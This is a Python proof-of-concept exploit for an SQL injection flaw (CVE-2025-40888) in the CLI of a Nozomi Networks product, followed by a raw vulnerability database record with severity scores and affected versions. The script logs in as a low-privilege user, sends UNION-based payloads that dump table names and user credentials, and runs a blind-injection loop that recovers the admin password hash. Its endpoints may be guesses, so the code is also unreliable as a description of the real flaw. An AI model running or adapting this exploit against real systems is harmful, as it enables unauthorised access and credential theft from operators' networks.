CVE-2025-40888

# CVE-2025-40888 PoC - Nozomi Networks CLI SQL Injection # Vulnerability: SQL Injection in CLI input parameter validation import requests import sys TARGET_URL = "https://target-nozomi-host/cli" USERNAME = "limited_user" PASSWORD = "password123" # Step 1: Authenticate to obtain session session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } session.post(f"{TARGET_URL}/login", data=login_data) # Step 2: Exploit SQL Injection via CLI parameter # The vulnerable parameter is passed to the CLI command handler # Inject UNION SELECT to extract data from other tables def exploit_sqli(injection_payload): """ Send malicious CLI command with SQL injection payload """ # Example: CLI command with injected SQL cli_command = { "command": "show-config", "filter": f"default' UNION SELECT {injection_payload}--" } response = session.post(f"{TARGET_URL}/execute", json=cli_command) return response.text # Extract database version print("[*] Extracting database version...") result = exploit_sqli("version(),user(),database()") print(f"[+] Result: {result}") # Extract table names print("[*] Enumerating tables...") result = exploit_sqli("table_name,null,null FROM information_schema.tables--") print(f"[+] Tables: {result}") # Extract user credentials print("[*] Extracting user credentials...") result = exploit_sqli("username,password,null FROM users--") print(f"[+] Credentials: {result}") # Boolean-based blind SQLi fallback def blind_sqli(condition): """ Use boolean-based blind injection if UNION doesn't work """ payload = f"default' AND (SELECT 1 FROM dual WHERE {condition})='1'--" cli_command = {"command": "show-config", "filter": payload} response = session.post(f"{TARGET_URL}/execute", json=cli_command) return "exists" in response.text or len(response.text) > 100 # Example: Extract password hash character by character print("[*] Performing blind SQLi to extract admin password...") password_hash = "" for i in range(1, 33): for c in "0123456789abcdef": if blind_sqli(f"SUBSTRING((SELECT password FROM users WHERE role='admin'),{i},1)='{c}'"): password_hash += c print(f"[+] Hash so far: {password_hash}") break print(f"[+] Admin password hash: {password_hash}")

{"cve": {"id": "CVE-2025-40888", "sourceIdentifier": "[email protected]", "published": "2025-10-07T13:15:34.967", "lastModified": "2025-10-09T16:37:58.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability was discovered in the CLI functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3.0", "matchCriteriaId": "B57D95A7-0CC3-4C20-AEFF-6671B129B5AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3.0", "matchCriteriaId": "30E53ED6-F534-45FB-951A-C411EC1C50EE"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:10-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}